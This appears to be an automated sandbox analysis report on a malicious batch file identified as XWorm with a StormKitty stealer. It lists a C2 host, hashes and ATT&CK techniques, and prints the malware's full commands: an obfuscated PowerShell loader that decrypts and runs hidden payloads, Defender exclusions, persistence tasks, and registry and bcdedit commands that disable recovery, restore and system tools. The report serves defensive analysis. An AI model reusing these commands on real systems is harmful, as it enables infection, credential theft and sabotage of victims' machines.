Analysis
-
max time kernel
299s -
max time network
308s -
platform
windows10-1703_x64 -
resource
win10-20240611-en -
resource tags
arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system -
submitted
25-08-2024 06:57
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win10-20240611-en
Behavioral task
behavioral2
Sample
Uni.bat
Resource
win11-20240802-en
General
-
Target
Uni.bat
-
Size
359KB
-
MD5
358406bc7ed5155f85a5ff1c578ee295
-
SHA1
4e333529ae320ad77ebcc36fd9baa55796dc001d
-
SHA256
da95cdaddcd020f216d54f93ebb9f0c8246b9dc1d02d9df60d898bc6c58e8ecf
-
SHA512
0017064f87d9b5458e17c7e7348aa1ad0a3b1713ae44c202ab71e271b6a8a76bed7a3142cebe0b4a10c08220fbfae4f109a784151ca85130d48dbcb4dee65f45
-
SSDEEP
6144:ZbaZI71pQSxrJ9chRObtodtQlcxWHovdigPbYDDV:Zbac1ySxr/3bU3FzUh
Malware Config
Extracted
xworm
5.0
las-protected.gl.at.ply.gg:59571
bDBtf4nPCk2LZaWE
-
Install_directory
%Userprofile%
-
install_file
Uni.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/4316-120-0x0000019C77920000-0x0000019C77930000-memory.dmp family_xworm -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/4316-425-0x0000019C78180000-0x0000019C782A0000-memory.dmp family_stormkitty -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2004 bcdedit.exe 4812 bcdedit.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 3 4316 powershell.exe 6 4316 powershell.exe 22 4316 powershell.exe 23 4316 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4876 powershell.exe 2940 powershell.exe 4668 powershell.exe 4448 powershell.exe 1388 powershell.exe 4316 powershell.exe 3572 powershell.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3504 Uni.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Run\Uni = "C:\\Users\\Admin\\Uni.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\Recovery ReAgentc.exe File opened for modification C:\Windows\system32\Recovery\ReAgent.xml ReAgentc.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File created C:\Windows\FONTS\eudcadm.tte eudcedit.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2248 sc.exe 2204 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4364 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3572 powershell.exe 3572 powershell.exe 3572 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4876 powershell.exe 4876 powershell.exe 4876 powershell.exe 2940 powershell.exe 2940 powershell.exe 2940 powershell.exe 4668 powershell.exe 4668 powershell.exe 4668 powershell.exe 4448 powershell.exe 4448 powershell.exe 4448 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4316 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3572 powershell.exe Token: SeDebugPrivilege 1388 powershell.exe Token: SeIncreaseQuotaPrivilege 1388 powershell.exe Token: SeSecurityPrivilege 1388 powershell.exe Token: SeTakeOwnershipPrivilege 1388 powershell.exe Token: SeLoadDriverPrivilege 1388 powershell.exe Token: SeSystemProfilePrivilege 1388 powershell.exe Token: SeSystemtimePrivilege 1388 powershell.exe Token: SeProfSingleProcessPrivilege 1388 powershell.exe Token: SeIncBasePriorityPrivilege 1388 powershell.exe Token: SeCreatePagefilePrivilege 1388 powershell.exe Token: SeBackupPrivilege 1388 powershell.exe Token: SeRestorePrivilege 1388 powershell.exe Token: SeShutdownPrivilege 1388 powershell.exe Token: SeDebugPrivilege 1388 powershell.exe Token: SeSystemEnvironmentPrivilege 1388 powershell.exe Token: SeRemoteShutdownPrivilege 1388 powershell.exe Token: SeUndockPrivilege 1388 powershell.exe Token: SeManageVolumePrivilege 1388 powershell.exe Token: 33 1388 powershell.exe Token: 34 1388 powershell.exe Token: 35 1388 powershell.exe Token: 36 1388 powershell.exe Token: SeIncreaseQuotaPrivilege 1388 powershell.exe Token: SeSecurityPrivilege 1388 powershell.exe Token: SeTakeOwnershipPrivilege 1388 powershell.exe Token: SeLoadDriverPrivilege 1388 powershell.exe Token: SeSystemProfilePrivilege 1388 powershell.exe Token: SeSystemtimePrivilege 1388 powershell.exe Token: SeProfSingleProcessPrivilege 1388 powershell.exe Token: SeIncBasePriorityPrivilege 1388 powershell.exe Token: SeCreatePagefilePrivilege 1388 powershell.exe Token: SeBackupPrivilege 1388 powershell.exe Token: SeRestorePrivilege 1388 powershell.exe Token: SeShutdownPrivilege 1388 powershell.exe Token: SeDebugPrivilege 1388 powershell.exe Token: SeSystemEnvironmentPrivilege 1388 powershell.exe Token: SeRemoteShutdownPrivilege 1388 powershell.exe Token: SeUndockPrivilege 1388 powershell.exe Token: SeManageVolumePrivilege 1388 powershell.exe Token: 33 1388 powershell.exe Token: 34 1388 powershell.exe Token: 35 1388 powershell.exe Token: 36 1388 powershell.exe Token: SeIncreaseQuotaPrivilege 1388 powershell.exe Token: SeSecurityPrivilege 1388 powershell.exe Token: SeTakeOwnershipPrivilege 1388 powershell.exe Token: SeLoadDriverPrivilege 1388 powershell.exe Token: SeSystemProfilePrivilege 1388 powershell.exe Token: SeSystemtimePrivilege 1388 powershell.exe Token: SeProfSingleProcessPrivilege 1388 powershell.exe Token: SeIncBasePriorityPrivilege 1388 powershell.exe Token: SeCreatePagefilePrivilege 1388 powershell.exe Token: SeBackupPrivilege 1388 powershell.exe Token: SeRestorePrivilege 1388 powershell.exe Token: SeShutdownPrivilege 1388 powershell.exe Token: SeDebugPrivilege 1388 powershell.exe Token: SeSystemEnvironmentPrivilege 1388 powershell.exe Token: SeRemoteShutdownPrivilege 1388 powershell.exe Token: SeUndockPrivilege 1388 powershell.exe Token: SeManageVolumePrivilege 1388 powershell.exe Token: 33 1388 powershell.exe Token: 34 1388 powershell.exe Token: 35 1388 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4316 powershell.exe 2604 eudcedit.exe 2604 eudcedit.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2180 wrote to memory of 3876 2180 cmd.exe 72 PID 2180 wrote to memory of 3876 2180 cmd.exe 72 PID 3876 wrote to memory of 4380 3876 net.exe 73 PID 3876 wrote to memory of 4380 3876 net.exe 73 PID 2180 wrote to memory of 3572 2180 cmd.exe 74 PID 2180 wrote to memory of 3572 2180 cmd.exe 74 PID 3572 wrote to memory of 1388 3572 powershell.exe 76 PID 3572 wrote to memory of 1388 3572 powershell.exe 76 PID 3572 wrote to memory of 4296 3572 powershell.exe 78 PID 3572 wrote to memory of 4296 3572 powershell.exe 78 PID 4296 wrote to memory of 4932 4296 WScript.exe 79 PID 4296 wrote to memory of 4932 4296 WScript.exe 79 PID 4932 wrote to memory of 3144 4932 cmd.exe 81 PID 4932 wrote to memory of 3144 4932 cmd.exe 81 PID 3144 wrote to memory of 3732 3144 net.exe 82 PID 3144 wrote to memory of 3732 3144 net.exe 82 PID 4932 wrote to memory of 4316 4932 cmd.exe 83 PID 4932 wrote to memory of 4316 4932 cmd.exe 83 PID 4316 wrote to memory of 4876 4316 powershell.exe 84 PID 4316 wrote to memory of 4876 4316 powershell.exe 84 PID 4316 wrote to memory of 2940 4316 powershell.exe 87 PID 4316 wrote to memory of 2940 4316 powershell.exe 87 PID 4316 wrote to memory of 4668 4316 powershell.exe 89 PID 4316 wrote to memory of 4668 4316 powershell.exe 89 PID 4316 wrote to memory of 4448 4316 powershell.exe 91 PID 4316 wrote to memory of 4448 4316 powershell.exe 91 PID 4316 wrote to memory of 4364 4316 powershell.exe 93 PID 4316 wrote to memory of 4364 4316 powershell.exe 93 PID 4316 wrote to memory of 4180 4316 powershell.exe 95 PID 4316 wrote to memory of 4180 4316 powershell.exe 95 PID 4180 wrote to memory of 4912 4180 cmd.exe 97 PID 4180 wrote to memory of 4912 4180 cmd.exe 97 PID 4180 wrote to memory of 1176 4180 cmd.exe 98 PID 4180 wrote to memory of 1176 4180 cmd.exe 98 PID 4180 wrote to memory of 4424 4180 cmd.exe 99 PID 4180 wrote to memory of 4424 4180 cmd.exe 99 PID 4180 wrote to memory of 3968 4180 cmd.exe 100 PID 4180 wrote to memory of 3968 4180 cmd.exe 100 PID 4180 wrote to memory of 2012 4180 cmd.exe 101 PID 4180 wrote to memory of 2012 4180 cmd.exe 101 PID 4180 wrote to memory of 2004 4180 cmd.exe 102 PID 4180 wrote to memory of 2004 4180 cmd.exe 102 PID 4180 wrote to memory of 4732 4180 cmd.exe 103 PID 4180 wrote to memory of 4732 4180 cmd.exe 103 PID 4180 wrote to memory of 2804 4180 cmd.exe 104 PID 4180 wrote to memory of 2804 4180 cmd.exe 104 PID 4180 wrote to memory of 4440 4180 cmd.exe 105 PID 4180 wrote to memory of 4440 4180 cmd.exe 105 PID 4180 wrote to memory of 2964 4180 cmd.exe 106 PID 4180 wrote to memory of 2964 4180 cmd.exe 106 PID 4180 wrote to memory of 3176 4180 cmd.exe 107 PID 4180 wrote to memory of 3176 4180 cmd.exe 107 PID 4180 wrote to memory of 3788 4180 cmd.exe 108 PID 4180 wrote to memory of 3788 4180 cmd.exe 108 PID 4180 wrote to memory of 2612 4180 cmd.exe 109 PID 4180 wrote to memory of 2612 4180 cmd.exe 109 PID 4180 wrote to memory of 2044 4180 cmd.exe 110 PID 4180 wrote to memory of 2044 4180 cmd.exe 110 PID 4180 wrote to memory of 2684 4180 cmd.exe 111 PID 4180 wrote to memory of 2684 4180 cmd.exe 111 PID 4180 wrote to memory of 4076 4180 cmd.exe 112 PID 4180 wrote to memory of 4076 4180 cmd.exe 112 PID 4180 wrote to memory of 4284 4180 cmd.exe 113 PID 4180 wrote to memory of 4284 4180 cmd.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:4380
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FCWcthcvES5kWtKK+zyMWPaI12cI41cfQ1vED+zLcNQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Wi091llD0HYkl0mjuqK1Mw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dIHUu=New-Object System.IO.MemoryStream(,$param_var); $WlPMS=New-Object System.IO.MemoryStream; $ppSDL=New-Object System.IO.Compression.GZipStream($dIHUu, [IO.Compression.CompressionMode]::Decompress); $ppSDL.CopyTo($WlPMS); $ppSDL.Dispose(); $dIHUu.Dispose(); $WlPMS.Dispose(); $WlPMS.ToArray();}function execute_function($param_var,$param2_var){ $AbXeo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MiFGd=$AbXeo.EntryPoint; $MiFGd.Invoke($null, $param2_var);}$AMhPZ = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $AMhPZ;$pvMmn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($AMhPZ).Split([Environment]::NewLine);foreach ($CTBGC in $pvMmn) { if ($CTBGC.StartsWith(':: ')) { $lWiIS=$CTBGC.Substring(3); break; }}$payloads_var=[string[]]$lWiIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_153_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_153.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1388
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_153.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_153.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\system32\net.exenet file5⤵
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file6⤵PID:3732
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FCWcthcvES5kWtKK+zyMWPaI12cI41cfQ1vED+zLcNQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Wi091llD0HYkl0mjuqK1Mw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dIHUu=New-Object System.IO.MemoryStream(,$param_var); $WlPMS=New-Object System.IO.MemoryStream; $ppSDL=New-Object System.IO.Compression.GZipStream($dIHUu, [IO.Compression.CompressionMode]::Decompress); $ppSDL.CopyTo($WlPMS); $ppSDL.Dispose(); $dIHUu.Dispose(); $WlPMS.Dispose(); $WlPMS.ToArray();}function execute_function($param_var,$param2_var){ $AbXeo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MiFGd=$AbXeo.EntryPoint; $MiFGd.Invoke($null, $param2_var);}$AMhPZ = 'C:\Users\Admin\AppData\Roaming\startup_str_153.bat';$host.UI.RawUI.WindowTitle = $AMhPZ;$pvMmn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($AMhPZ).Split([Environment]::NewLine);foreach ($CTBGC in $pvMmn) { if ($CTBGC.StartsWith(':: ')) { $lWiIS=$CTBGC.Substring(3); break; }}$payloads_var=[string[]]$lWiIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Uni.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4448
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:4364
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lpociz.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:4180 -
C:\Windows\system32\ReAgentc.exereagentc /disable7⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:4912
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f7⤵PID:1176
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f7⤵PID:4424
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f7⤵PID:3968
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsSetupOptions" /t REG_DWORD /d 1 /f7⤵PID:2012
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures7⤵
- Modifies boot configuration data using bcdedit
PID:2004
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f7⤵PID:4732
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d 0 /f7⤵PID:2804
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f7⤵PID:4440
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f7⤵PID:2964
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f7⤵PID:3176
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f7⤵PID:3788
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f7⤵
- Disables RegEdit via registry modification
PID:2612
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v "fAllowToGetHelp" /t REG_DWORD /d 0 /f7⤵PID:2044
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d 1 /f7⤵PID:2684
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowCPL" /t REG_DWORD /d 1 /f7⤵PID:4076
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoThemesTab" /t REG_DWORD /d 1 /f7⤵PID:4284
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoDispSettings" /t REG_DWORD /d 1 /f7⤵PID:4496
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f7⤵PID:2096
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f7⤵PID:2380
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f7⤵PID:2796
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No7⤵
- Modifies boot configuration data using bcdedit
PID:4812
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 2 /f7⤵PID:96
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\WinRE" /v "DisableStatusMessages" /t REG_DWORD /d 1 /f7⤵PID:1508
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute" /v "AutoChk" /t REG_MULTI_SZ /d "" /f7⤵PID:4856
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f7⤵PID:2624
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "\Microsoft\Windows\WinRE\WinREBootIndex" /Disable7⤵PID:4756
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "\Microsoft\Windows\WinRE\WinRECleanup" /Disable7⤵PID:2404
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Services\sr" /v "Start" /t REG_DWORD /d 4 /f7⤵PID:832
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\CrashControl" /v "AutoReboot" /t REG_DWORD /d 0 /f7⤵PID:1828
-
-
C:\Windows\system32\sc.exesc config wercplsupport start=disabled7⤵
- Launches sc.exe
PID:2248
-
-
C:\Windows\system32\sc.exesc config WerSvc start=disabled7⤵
- Launches sc.exe
PID:2204
-
-
-
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵PID:4328
-
C:\Users\Admin\Uni.exeC:\Users\Admin\Uni.exe1⤵
- Executes dropped EXE
PID:3504
-
C:\Windows\system32\eudcedit.exe"C:\Windows\system32\eudcedit.exe"1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:2604
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵PID:4356
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
1KB
MD50869030f7e13786291243ca4a192588d
SHA1b21e2f75666dd2d5d5dd841fa5d7e0cd9d5aaa9b
SHA2567e40e2510ef6feb9e8532a55f3f54abc332cab5293dda19701c14e3d708de762
SHA512900fe3627cc98aecb119f1efdf8fbc46e2ae861f9b27c667ba0164b253ae9728a84f610810a7f4c1a169fa1d6ed4a309e1bec4f4b5f6fb2f65f8b67062db923d
-
Filesize
1KB
MD51fbbf712fe7afb8b9d118ea50b362b68
SHA1015d64c5d23a3d32f314273d44779b497d4ec1c4
SHA2569e350c7160cc69636897313ca63db9746485312aa2346b3629dec783322c2c84
SHA5124bc10cfb2ea7339302ed76043160d1173b3708b21b6402d4087c81eb8f2165bbf0541cdacbea3a1b6a06f4d594feaac7a802ed3df7db751a3ada33d47d13677f
-
Filesize
1KB
MD55b3d652371070a101abf31c5feae12dc
SHA1b49570cde68379d64a45e692a158392fa48012b3
SHA256612a34095ff6299aacf6ff02e61e8cdae1bfe4d6bf62d8c302284b2988ef5fbd
SHA5124481f5fd198f787e9b64f2297d09566b53ab772c779f885f795f3bc1946baece2c553849c522ff6fd5d61cd653cf1de547ab4ac6eec6da26355b227db3a75277
-
Filesize
1KB
MD576afb458030b8ea422b69e7381a2d180
SHA1c9cc1c421428b5feefda78e7e0c7a7892311d019
SHA256db58d284ba096140c22528d5fa06ef315d1e6663392b447d41112c892c14ed30
SHA512debf8daaa41eb72ce042f44f813c3e8c6b607cf8dfe72946a92412293ee003227438a457bd6519b063f2d0f43b593a25247a5422a34d4f660f2e2a3ada523009
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
